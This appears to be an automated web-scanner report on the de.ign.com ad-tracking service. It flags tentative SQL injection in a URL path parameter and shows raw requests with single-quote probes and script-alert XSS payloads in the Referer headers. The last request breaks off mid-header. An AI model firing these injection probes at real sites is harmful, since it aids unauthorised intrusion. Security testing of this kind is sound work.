GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=5813,7752,10619,20838&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cWtjorh,bguRqRgbdmoWz HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=5813,7752,10619,20838&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cWtjorh,bguRqRgbdmoWz HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:10 GMT
Connection: close
Vary: Accept-Encoding


1.20. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,110,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bWkwpka,bguRrblewbsuw [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,110,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bWkwpka,bguRrblewbsuw

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,110,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bWkwpka,bguRrblewbsuw HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:04 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,110,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bWkwpka,bguRrblewbsuw HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:04 GMT
Connection: close
Vary: Accept-Encoding


1.21. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,110,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cblcosc,bguRqRgbdmoWs [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,110,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cblcosc,bguRqRgbdmoWs

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,110,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cblcosc,bguRqRgbdmoWs HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:17 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,110,2747,4602,4603,4723,4897,4917,4954,5031,5718,5749,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=6671,10619&Values=25,31,43,60,72,80,91,101,110,150,152,235,288,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cblcosc,bguRqRgbdmoWs HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(1)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634326084499542327&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmb=173446715; __utmc=173446715; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; rsi_segs=; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:18 GMT
Connection: close
Vary: Accept-Encoding


1.22. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=cwfxRKn,bguRregbdnkiy [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=cwfxRKn,bguRregbdnkiy

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=cwfxRKn,bguRregbdnkiy HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://my.ign.com/register?r=http://www.ign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; __utmb=173446715.1.10.1297040497; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:22 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=cwfxRKn,bguRregbdnkiy HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://my.ign.com/register?r=http://www.ign.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; decc=US; NGUserID=a016c09-18740-885768600-2; i18n-cc=US; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; __utmb=173446715.1.10.1297040497; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:22 GMT
Connection: close
Vary: Accept-Encoding


1.23. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=cwfxRKn,bguRregbdnkiy/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=cwfxRKn,bguRregbdnkiy/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=43083&FlightID=550&TargetID=6671&EntityDefResetFlag=0&C=0&Segments=19,2747,4602,4603,4723,4897,4917,4954,5031,5718,5745,5906,6102,6382,6573,6705,7102,7396,7752,7888,8587,9598,11754,14845,15232,16249,16251,17210,22099,22854,23425,23427,23472,23479,23480,23493&Targets=6671,10619&Values=25,46,60,72,80,91,101,110,150,152,222,288,531,757,912,1187,1405,1481,1591,1824,2337,2986,3887,3932,4056,4227,4662,4799,5999,6623,8151,8210,8978,9180,41899,61350,61578,61766,61919,65369&RawValues=&random=cwfxRKn,bguRregbdnkiy/ HTTP/1.1
Host: de.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=10089; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; decc=US; NGUserID=a016c06-15003-1306593845-5; 